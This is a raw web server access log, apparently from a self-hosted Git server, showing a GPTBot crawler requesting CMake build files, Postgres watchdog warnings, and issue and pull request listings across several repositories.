[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15213] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35741] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46765] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42760] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46767] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35739] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46762] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12516] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr 